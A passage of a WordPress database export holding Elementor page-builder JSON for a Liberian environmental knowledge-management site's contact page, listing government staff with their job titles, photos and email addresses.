href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong>\\n<\\/br>\\nManager, Strategic Planning Unit\\n<\\/br>\\nForestry Development Auhtority\\n<\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24455,3608,'_elementor_edit_mode','builder'),(24456,3608,'_elementor_template_type','wp-page'),(24457,3608,'_elementor_version','3.0.16'),(24458,3608,'_wp_page_template','default'),(24459,3608,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 